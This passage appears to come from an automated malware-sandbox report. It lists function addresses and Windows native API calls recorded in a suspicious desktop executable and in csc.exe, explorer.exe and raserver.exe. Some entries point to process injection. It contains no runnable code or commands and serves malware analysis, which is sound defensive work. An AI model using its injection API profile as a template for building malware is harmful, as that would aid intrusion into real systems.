          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD34E0 NtCreateMutant,LdrInitializeThunk,5_2_04FD34E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2CF0 NtDelayExecution,LdrInitializeThunk,5_2_04FD2CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2C30 NtMapViewOfSection,LdrInitializeThunk,5_2_04FD2C30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04FD2DC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_04FD2D10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2E50 NtCreateSection,LdrInitializeThunk,5_2_04FD2E50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2F00 NtCreateFile,LdrInitializeThunk,5_2_04FD2F00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD29F0 NtReadFile,LdrInitializeThunk,5_2_04FD29F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2A80 NtClose,LdrInitializeThunk,5_2_04FD2A80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_04FD2BC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04FD2B90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2B80 NtCreateKey,LdrInitializeThunk,5_2_04FD2B80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04FD2B10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2B00 NtQueryValueKey,LdrInitializeThunk,5_2_04FD2B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD4570 NtSuspendThread,5_2_04FD4570
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD4260 NtSetContextThread,5_2_04FD4260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2CD0 NtEnumerateKey,5_2_04FD2CD0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD3C90 NtOpenThread,5_2_04FD3C90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2C50 NtUnmapViewOfSection,5_2_04FD2C50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD3C30 NtOpenProcessToken,5_2_04FD3C30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2C20 NtSetInformationFile,5_2_04FD2C20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2C10 NtOpenProcess,5_2_04FD2C10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2DA0 NtReadVirtualMemory,5_2_04FD2DA0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2D50 NtWriteVirtualMemory,5_2_04FD2D50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2ED0 NtResumeThread,5_2_04FD2ED0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2EC0 NtQuerySection,5_2_04FD2EC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2EB0 NtProtectVirtualMemory,5_2_04FD2EB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2E80 NtCreateProcessEx,5_2_04FD2E80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2E00 NtQueueApcThread,5_2_04FD2E00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2FB0 NtSetValueKey,5_2_04FD2FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2F30 NtOpenDirectoryObject,5_2_04FD2F30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD38D0 NtGetContextThread,5_2_04FD38D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD29D0 NtWaitForSingleObject,5_2_04FD29D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2AC0 NtEnumerateValueKey,5_2_04FD2AC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2AA0 NtQueryInformationFile,5_2_04FD2AA0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2A10 NtWriteFile,5_2_04FD2A10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2BE0 NtQueryVirtualMemory,5_2_04FD2BE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FD2B20 NtQueryInformationProcess,5_2_04FD2B20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A360 NtCreateFile,5_2_00C6A360
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A490 NtClose,5_2_00C6A490
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A410 NtReadFile,5_2_00C6A410
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A540 NtAllocateVirtualMemory,5_2_00C6A540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A3B2 NtCreateFile,5_2_00C6A3B2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A35B NtCreateFile,5_2_00C6A35B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A48B NtClose,5_2_00C6A48B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00C6A40A NtReadFile,5_2_00C6A40A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052BA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_052BA036
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052B9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_052B9BAF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052BA042 NtQueryInformationProcess,5_2_052BA042
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_052B9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_052B9BB2
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5CDFD00_2_00007FF72F5CDFD0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D0C500_2_00007FF72F5D0C50
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C88300_2_00007FF72F5C8830
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D88D90_2_00007FF72F5D88D9
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D23700_2_00007FF72F5D2370
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B93400_2_00007FF72F5B9340
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5CD16A0_2_00007FF72F5CD16A
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F6700E00_2_00007FF72F6700E0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B80D00_2_00007FF72F5B80D0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D3F600_2_00007FF72F5D3F60
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5BEFE00_2_00007FF72F5BEFE0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5DBEA00_2_00007FF72F5DBEA0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C2D300_2_00007FF72F5C2D30
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5CFDD00_2_00007FF72F5CFDD0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D7C790_2_00007FF72F5D7C79
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D5C200_2_00007FF72F5D5C20
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C4CD90_2_00007FF72F5C4CD9
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5CFB400_2_00007FF72F5CFB40
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5DBBA00_2_00007FF72F5DBBA0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F667BA00_2_00007FF72F667BA0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5E4A400_2_00007FF72F5E4A40
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5A6A500_2_00007FF72F5A6A50
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B6A500_2_00007FF72F5B6A50
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C9A500_2_00007FF72F5C9A50
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F662AC00_2_00007FF72F662AC0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5DF9600_2_00007FF72F5DF960
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B1A000_2_00007FF72F5B1A00
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D99C30_2_00007FF72F5D99C3
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5CA8500_2_00007FF72F5CA850
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F6019100_2_00007FF72F601910
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5BE8A00_2_00007FF72F5BE8A0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5AA8B00_2_00007FF72F5AA8B0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B27500_2_00007FF72F5B2750
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5DC8000_2_00007FF72F5DC800
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C67F00_2_00007FF72F5C67F0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5DA7B00_2_00007FF72F5DA7B0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C36400_2_00007FF72F5C3640
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5CB6B00_2_00007FF72F5CB6B0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5DE5400_2_00007FF72F5DE540
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C15200_2_00007FF72F5C1520
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C66100_2_00007FF72F5C6610
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D35C00_2_00007FF72F5D35C0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F6534800_2_00007FF72F653480
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B04700_2_00007FF72F5B0470
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D14700_2_00007FF72F5D1470
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5CA4200_2_00007FF72F5CA420
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5A94300_2_00007FF72F5A9430
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5DB4F00_2_00007FF72F5DB4F0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C44D00_2_00007FF72F5C44D0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D43900_2_00007FF72F5D4390
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C03600_2_00007FF72F5C0360
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5DD3200_2_00007FF72F5DD320
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5A83C40_2_00007FF72F5A83C4
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5DF2800_2_00007FF72F5DF280
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F67E2400_2_00007FF72F67E240
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5A82200_2_00007FF72F5A8220
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D52E00_2_00007FF72F5D52E0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D92CE0_2_00007FF72F5D92CE
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5DB1800_2_00007FF72F5DB180
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C61900_2_00007FF72F5C6190
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C52000_2_00007FF72F5C5200
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5E12000_2_00007FF72F5E1200
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5C82000_2_00007FF72F5C8200
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5D91B00_2_00007FF72F5D91B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041D8C43_2_0041D8C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041EB713_2_0041EB71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00402D883_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0041DE5E3_2_0041DE5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00409E603_2_00409E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D275C63_2_05D275C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2F5C93_2_05D2F5C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D3A5263_2_05D3A526
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C704453_2_05C70445
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D267573_2_05D26757
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C727603_2_05C72760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7A7603_2_05C7A760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2A6C03_2_05D2A6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE36EC3_2_05CE36EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2F6F63_2_05D2F6F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6C6E03_2_05C6C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C706803_2_05C70680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1D6463_2_05D1D646
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C946703_2_05C94670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8C6003_2_05C8C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0D62C3_2_05D0D62C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C751C03_2_05C751C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B1E03_2_05C8B1E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CB717A3_2_05CB717A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5F1133_2_05C5F113
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D3010E3_2_05D3010E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0D1303_2_05D0D130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7B0D03_2_05C7B0D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D270F13_2_05D270F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C600A03_2_05C600A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1E0763_2_05D1E076
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C613803_2_05C61380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7E3103_2_05C7E310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2F3303_2_05D2F330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C5D2EC3_2_05C5D2EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2124C3_2_05D2124C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C79DD03_2_05C79DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D0FDF43_2_05D0FDF4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C82DB03_2_05C82DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D27D4C3_2_05D27D4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70D693_2_05C70D69
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6AD003_2_05C6AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2FD273_2_05D2FD27
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C88CDF3_2_05C88CDF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8FCE03_2_05C8FCE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D3ACEB3_2_05D3ACEB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D09C983_2_05D09C98
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1EC4C3_2_05D1EC4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C73C603_2_05C73C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2EC603_2_05D2EC60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D26C693_2_05D26C69
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C60C123_2_05C60C12
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7AC203_2_05C7AC20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D21FC63_2_05D21FC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2EFBF3_2_05D2EFBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2FF633_2_05D2FF63
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7CF003_2_05C7CF00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D29ED23_2_05D29ED2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C62EE83_2_05C62EE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C71EB23_2_05C71EB2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D20EAD3_2_05D20EAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C90E503_2_05C90E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D10E6D3_2_05D10E6D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6E9A03_2_05C6E9A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2E9A63_2_05D2E9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C728C03_2_05C728C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D218DA3_2_05D218DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D278F33_2_05D278F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C868823_2_05C86882
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE98B23_2_05CE98B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2F8723_2_05D2F872
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C568683_2_05C56868
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C798703_2_05C79870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8B8703_2_05C8B870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C738003_2_05C73800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D108353_2_05D10835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE4BC03_2_05CE4BC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C70B103_2_05C70B10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D2FB2E3_2_05D2FB2E
          Source: C:\Windows\explorer.exeCode function: 4_2_0287D2324_2_0287D232
          Source: C:\Windows\explorer.exeCode function: 4_2_028730824_2_02873082
          Source: C:\Windows\explorer.exeCode function: 4_2_0287C0364_2_0287C036
          Source: C:\Windows\explorer.exeCode function: 4_2_028805CD4_2_028805CD
          Source: C:\Windows\explorer.exeCode function: 4_2_02874D024_2_02874D02
          Source: C:\Windows\explorer.exeCode function: 4_2_0287A9124_2_0287A912
          Source: C:\Windows\explorer.exeCode function: 4_2_02877B324_2_02877B32
          Source: C:\Windows\explorer.exeCode function: 4_2_02877B304_2_02877B30
          Source: C:\Windows\explorer.exeCode function: 4_2_13445B304_2_13445B30
          Source: C:\Windows\explorer.exeCode function: 4_2_13445B324_2_13445B32
          Source: C:\Windows\explorer.exeCode function: 4_2_1344B2324_2_1344B232
          Source: C:\Windows\explorer.exeCode function: 4_2_13442D024_2_13442D02
          Source: C:\Windows\explorer.exeCode function: 4_2_134489124_2_13448912
          Source: C:\Windows\explorer.exeCode function: 4_2_1344E5CD4_2_1344E5CD
          Source: C:\Windows\explorer.exeCode function: 4_2_1344A0364_2_1344A036
          Source: C:\Windows\explorer.exeCode function: 4_2_134410824_2_13441082
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D15F645_2_00D15F64
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0506A5265_2_0506A526
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA04455_2_04FA0445
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_050575C65_2_050575C6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505F5C95_2_0505F5C9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F9C6E05_2_04F9C6E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_050567575_2_05056757
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA06805_2_04FA0680
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FC46705_2_04FC4670
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FBC6005_2_04FBC600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0503D62C5_2_0503D62C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0504D6465_2_0504D646
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA27605_2_04FA2760
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FAA7605_2_04FAA760
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505A6C05_2_0505A6C0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_050136EC5_2_050136EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505F6F65_2_0505F6F6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0506010E5_2_0506010E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FAB0D05_2_04FAB0D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0503D1305_2_0503D130
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F900A05_2_04F900A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FBB1E05_2_04FBB1E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA51C05_2_04FA51C0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0504E0765_2_0504E076
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FE717A5_2_04FE717A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F8F1135_2_04F8F113
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_050570F15_2_050570F1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F8D2EC5_2_04F8D2EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505F3305_2_0505F330
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F913805_2_04F91380
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FAE3105_2_04FAE310
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FBFCE05_2_04FBFCE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0505FD275_2_0505FD27
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FB8CDF5_2_04FB8CDF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_05057D4C5_2_05057D4C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA3C605_2_04FA3C60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FAAC205_2_04FAAC20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04F90C125_2_04F90C12
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0503FDF45_2_0503FDF4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_04FA9DD05_2_04FA9DD0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_0504EC4C5_2_0504EC4C
